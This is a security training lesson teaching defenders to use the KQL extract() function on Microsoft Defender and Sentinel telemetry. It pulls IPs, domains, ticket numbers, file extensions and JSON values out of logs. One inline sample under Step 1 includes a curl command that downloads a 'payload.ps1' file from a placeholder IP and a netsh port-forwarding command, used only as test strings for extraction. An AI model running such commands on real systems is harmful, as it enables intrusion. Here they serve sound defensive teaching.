Agent Foskett Academy • Lesson 26 • Extracting Evidence with extract()

Extracting Evidence with extract()

Sometimes the evidence is not sitting neatly between two predictable pieces of text.
It might be hidden inside a command line, URL, subject line, file path, alert field or custom log message.

This is where extract() becomes useful. Instead of relying on a fixed string layout, defenders can use a regular expression capture group to pull out the value they need.

In this Agent Foskett Academy lesson, you will learn how defenders use the KQL extract() function to find IP addresses, domains, identifiers and other investigation evidence inside Microsoft Defender XDR and Microsoft Sentinel telemetry.

Lesson overview

Learn how extract() helps defenders pull evidence from flexible text patterns using regex capture groups.

Understand extract()
Use regex capture groups
Find hidden indicators
🎯 extract() helps when patterns are flexible.
Use it when the evidence follows a recognisable pattern, but the surrounding text is not consistent enough for parse.

Why extract() matters

The extract() function searches a string with a regular expression and returns the value from a capture group.

This is useful when the evidence is present, but the surrounding text may change between events.

Instead of manually reading long strings, defenders can extract the exact indicator they need into a clean column.
Find flexible patterns: Pull values from strings even when the surrounding text changes between events.
Create evidence columns: Turn hidden IP addresses, domains, identifiers and tokens into clear investigation fields.
Support deeper hunting: Use extracted values for filtering, summarising, joining and timeline building.
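
As a minimal sketch of the idea, the query below runs extract() over three hypothetical messages built inline with datatable. The sample rows, the CASE- prefix and the column names are assumptions for illustration, not real telemetry. The wording around the identifier differs in every row, yet the same capture group returns it each time.

```kql
// Hypothetical sample messages: the text around the case ID changes in every row.
datatable(Message: string)
[
    "User reported phishing, case ID CASE-10442 opened by SOC",
    "Escalated: CASE-20917 (priority high)",
    "Follow-up on CASE-30051 requested"
]
// Capture group 1 is the bracketed part: the literal prefix plus the digits.
| extend CaseId = extract(@"(CASE-\d+)", 1, Message)
| project CaseId, Message
```

Because the sample data is defined in the query itself, this can be pasted into any KQL query window to try the pattern before pointing it at live tables.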

Investigation scenario

An analyst is reviewing suspicious endpoint and email activity after a phishing investigation.

Some command lines contain IP addresses. Some URLs contain suspicious domains. Some email subjects contain case numbers and tracking identifiers.

The formats are not perfectly consistent, so the analyst uses extract() to pull the useful evidence out with regex capture groups.

Step 1 — Extract an IP address from a command line

Use extract() when you need to capture an IP address from a longer command-line string.
extract-ip-from-commandline.kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"\d{1,3}(\.\d{1,3}){3}"
| extend ExtractedIP = extract(@"(\d{1,3}(?:\.\d{1,3}){3})", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, FileName, ExtractedIP, ProcessCommandLine
| sort by Timestamp desc
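
One thing to keep in mind is that extract() returns only the first match in the string. The sketch below, which uses hypothetical command lines defined inline, compares it with extract_all(), which returns every match as an array. The added \b word boundaries are an optional tightening, not part of the lesson query, and ipv4_is_private() is used only to show one way the expanded values might be triaged.

```kql
// Hypothetical command lines, not real telemetry.
datatable(ProcessCommandLine: string)
[
    "curl http://203.0.113.45/payload.ps1 -o payload.ps1",
    "netsh interface portproxy add v4tov4 listenaddress=10.0.0.5 connectaddress=198.51.100.7",
    "setup.exe /version 1234.5.6.7890"
]
// extract() stops at the first match; \b keeps the pattern from matching inside longer digit runs.
| extend FirstIP = extract(@"\b(\d{1,3}(?:\.\d{1,3}){3})\b", 1, ProcessCommandLine)
// extract_all() returns a dynamic array holding every match of the capture group.
| extend AllIPs = extract_all(@"\b(\d{1,3}(?:\.\d{1,3}){3})\b", ProcessCommandLine)
| where isnotempty(AllIPs)
// One output row per extracted address.
| mv-expand IP = AllIPs to typeof(string)
| extend IsPrivate = ipv4_is_private(IP)
| project FirstIP, IP, IsPrivate, ProcessCommandLine
```

The pattern still accepts any four dot-separated numbers, including version strings such as 2.0.50.1 and out-of-range values such as 999.1.1.1, so extracted addresses are worth validating before they feed a join or a report.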

Step 2 — Extract a domain from a URL

URLs can contain useful domain evidence. extract() can capture the host portion for review.
extract-domain-from-url.kql
UrlClickEvents
| where Timestamp > ago(30d)
| extend ClickedDomain = extract(@"https?://([^/]+)", 1, Url)
| project Timestamp, AccountUpn, ClickedDomain, Url, ActionType, ThreatTypes
| sort by Timestamp desc
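
The capture group [^/]+ keeps everything up to the first forward slash, so a port number, or a query string on a URL that has no path, ends up in the extracted value. A quick way to see this is to compare the regex with the built-in parse_url() function on a few hypothetical URLs. This is a sketch for comparison only; the sample URLs and output column names are assumptions.

```kql
// Hypothetical URLs chosen to show where the simple pattern over-captures.
datatable(Url: string)
[
    "https://login.example.com/auth?id=1",
    "http://example.org:8080/path",
    "https://example.net?redirect=1"
]
// Same pattern as the lesson query: everything after the scheme up to the first "/".
| extend HostByRegex = extract(@"https?://([^/]+)", 1, Url)
// parse_url() returns a dynamic object; Host is one of its properties.
| extend HostByParseUrl = tostring(parse_url(Url).Host)
| project Url, HostByRegex, HostByParseUrl
```

If the two columns disagree for a row, that row is a good candidate for manual review before the domain is used in a summary.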

Step 3 — Extract an identifier from an email subject

When a subject line contains a case number, invoice number or ticket reference, extract() can capture just that value.
extract-ticket-from-subject.kql
EmailEvents
| where Timestamp > ago(30d)
| extend TicketNumber = extract(@"Ticket[- ]?(\d+)", 1, Subject)
| where isnotempty(TicketNumber)
| project Timestamp, SenderFromAddress, RecipientEmailAddress, TicketNumber, Subject, DeliveryAction
| sort by Timestamp desc
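
Two small variations may be useful here, shown as a sketch against hypothetical subject lines. The (?i) flag makes the pattern case-insensitive, and the optional fourth argument of extract() converts the captured text to a type, in this case long, so the ticket number can be sorted or compared numerically.

```kql
// Hypothetical subject lines, not real mail data.
datatable(Subject: string)
[
    "RE: Ticket-48213 password reset",
    "ticket 7731 follow up",
    "Invoice overdue"
]
// (?i) ignores case; typeof(long) converts the captured digits to a number.
| extend TicketNumber = extract(@"(?i)ticket[- ]?(\d+)", 1, Subject, typeof(long))
// A typed result is null when nothing matched, so test with isnotnull().
| where isnotnull(TicketNumber)
| project TicketNumber, Subject
```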

What extract() does

The extract() function has three important parts: the regex pattern, the capture group number and the source field. An optional fourth argument converts the result to a type such as long.

The capture group is the part of the pattern wrapped in round brackets (parentheses). That is the part of the pattern you want KQL to return: group 1 is the first bracketed part, and group 0 returns the whole match.
Regex pattern: The pattern that describes what you are trying to find inside the string.
Capture group: The bracketed part of the regex that becomes the extracted value.
Source field: The telemetry field being searched, such as ProcessCommandLine, Url or Subject.
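
To make the capture group number concrete, the sketch below applies one pattern with two groups to a single hypothetical request line and changes only the group number. The sample string and column names are assumptions for illustration.

```kql
// Hypothetical request line used as the source field.
print Source = "GET /download?id=4711&user=alice HTTP/1.1"
// Group 0 is the whole match: id=4711&user=alice
| extend WholeMatch = extract(@"id=(\d+)&user=(\w+)", 0, Source)
// Group 1 is the first bracketed part: 4711
| extend FirstGroup = extract(@"id=(\d+)&user=(\w+)", 1, Source)
// Group 2 is the second bracketed part: alice
| extend SecondGroup = extract(@"id=(\d+)&user=(\w+)", 2, Source)
```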

Step 4 — Extract a suspicious file extension

extract() can help identify file extensions from paths or filenames when reviewing endpoint telemetry.
extract-file-extension.kql
DeviceFileEvents
| where Timestamp > ago(14d)
| extend FileExtension = extract(@"\.([A-Za-z0-9]+)$", 1, FileName)
| where FileExtension in~ ("exe", "dll", "ps1", "vbs", "js")
| project Timestamp, DeviceName, ActionType, FileName, FileExtension, FolderPath
| sort by Timestamp desc
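
The same approach can be extended to flag double extensions such as invoice.pdf.exe. The sketch below is one possible variation, tested on hypothetical file names. The InnerExtension and HasDoubleExtension columns are names introduced here for illustration.

```kql
// Hypothetical file names, not real telemetry.
datatable(FileName: string)
[
    "invoice.pdf.exe",
    "report.docx",
    "update.PS1",
    "README"
]
// Final extension, as in the lesson query.
| extend FileExtension = extract(@"\.([A-Za-z0-9]+)$", 1, FileName)
// The extension that sits immediately before the final one, if there is one.
| extend InnerExtension = extract(@"\.([A-Za-z0-9]+)\.[A-Za-z0-9]+$", 1, FileName)
| extend HasDoubleExtension = isnotempty(InnerExtension)
| project FileName, FileExtension, InnerExtension, HasDoubleExtension
```

Versioned names such as tool.v2.exe would also be flagged by this pattern, so treat the result as a lead to review rather than a verdict.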

Step 5 — Extract values from additional fields

Some telemetry fields contain long text blobs or JSON-like data stored as text. extract() can still help when you only need one value.
extract-value-from-additionalfields.kql
DeviceEvents
| where Timestamp > ago(7d)
| where AdditionalFields has "RemoteIP"
| extend RemoteIP = extract(@'"RemoteIP"\s*:\s*"([^"]+)"', 1, tostring(AdditionalFields))
| project Timestamp, DeviceName, ActionType, RemoteIP, AdditionalFields
| sort by Timestamp desc
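
When the field holds well-formed JSON, parse_json() is an alternative way to reach the same value. The sketch below runs both approaches side by side on hypothetical AdditionalFields strings so the results can be compared. The sample values are assumptions, and real AdditionalFields content varies by event type.

```kql
// Hypothetical AdditionalFields values; spacing around the colon differs between rows.
datatable(AdditionalFields: string)
[
    '{"RemoteIP":"203.0.113.45","RemotePort":443}',
    '{"Command":"whoami", "RemoteIP" : "198.51.100.7"}',
    '{"Command":"ipconfig"}'
]
// Regex approach from the lesson query: \s* tolerates optional whitespace.
| extend RemoteIPByRegex = extract(@'"RemoteIP"\s*:\s*"([^"]+)"', 1, AdditionalFields)
// JSON approach: parse the string, then read the property by name.
| extend RemoteIPByJson = tostring(parse_json(AdditionalFields).RemoteIP)
| project RemoteIPByRegex, RemoteIPByJson, AdditionalFields
```

The regex version keeps working when the text is truncated or is not valid JSON, which is the situation where extract() tends to be the better fit.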

Step 6 — Combine extract() with summarize

Once evidence is extracted into a column, you can count it, group it and identify repeat activity.
extract-and-summarize-domains.kql
UrlClickEvents
| where Timestamp > ago(30d)
| extend ClickedDomain = extract(@"https?://([^/]+)", 1, Url)
| where isnotempty(ClickedDomain)
| summarize ClickCount = count(), Users = dcount(AccountUpn) by ClickedDomain
| top 25 by ClickCount desc
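
Host names are not case-sensitive, so the same domain written with different casing would otherwise be counted as separate groups. A small sketch of one way to handle this, using hypothetical click data, is to wrap the extraction in tolower() before summarising.

```kql
// Hypothetical click records, not real telemetry.
datatable(AccountUpn: string, Url: string)
[
    "alice@contoso.com", "https://Login.Example.com/auth",
    "bob@contoso.com",   "https://login.example.com/reset",
    "alice@contoso.com", "https://files.example.net/doc"
]
// Lower-case the extracted host so both spellings fall into the same group.
| extend ClickedDomain = tolower(extract(@"https?://([^/]+)", 1, Url))
| where isnotempty(ClickedDomain)
| summarize ClickCount = count(), Users = dcount(AccountUpn) by ClickedDomain
| top 25 by ClickCount desc
```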

Investigator notes

Use extract() when a value follows a pattern but the surrounding text is not reliable enough for parse.

Keep the regex as simple as possible. Start with one value, confirm the extracted column is correct, then build the rest of the investigation around it.
Start simple: Test the capture group against a small set of results before using it across large telemetry sets.
Validate the output: Always check extracted values before using them in joins, summaries or reports.
Use parse when cleaner: If the source field has a predictable structure, parse may be easier to read and maintain.
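
One way to put the first two notes into practice is to measure how often the pattern matches and to look at a few of the rows it missed. The sketch below does this on hypothetical subject lines. The Total, Extracted and MissedExamples column names are introduced here for illustration.

```kql
// Hypothetical subject lines used as a small test set.
datatable(Subject: string)
[
    "Ticket-48213 password reset",
    "Ticket 7731 follow up",
    "TICKET#9001 escalation",
    "Invoice overdue"
]
| extend TicketNumber = extract(@"Ticket[- ]?(\d+)", 1, Subject)
// Count the matches and keep up to five unmatched subjects for review.
| summarize
    Total = count(),
    Extracted = countif(isnotempty(TicketNumber)),
    MissedExamples = make_set_if(Subject, isempty(TicketNumber), 5)
```

Reviewing the missed examples shows whether the pattern needs adjusting, for example for a different separator or different casing, before it is trusted across a larger time range.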
🎓 Agent Foskett Academy — Flexible extraction
You now understand how to use extract() to pull useful evidence from flexible text patterns using regex capture groups.

What you learned

In this lesson, you learned how to use the KQL extract() function to pull evidence from flexible text patterns.
Using extract(): Extract IP addresses, domains, identifiers and file extensions from Microsoft security telemetry.
Regex capture groups: Use bracketed capture groups to return the exact part of the pattern that matters.
Knowing when to use it: Use extract() when the evidence follows a pattern but the full string structure is not consistent.

Continue your investigation

The next step is learning how to use mv-apply for more advanced multi-value investigations.
Agent Foskett Academy: Return to the full Academy learning path and review earlier KQL foundation lessons.
Using matches regex for Pattern Matching: Review how defenders use regex matching before extracting the evidence they need.

Continue learning with Extracting Evidence with parse, Working with parse_json(), KQL Threat Hunting Guide and Microsoft Security.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD
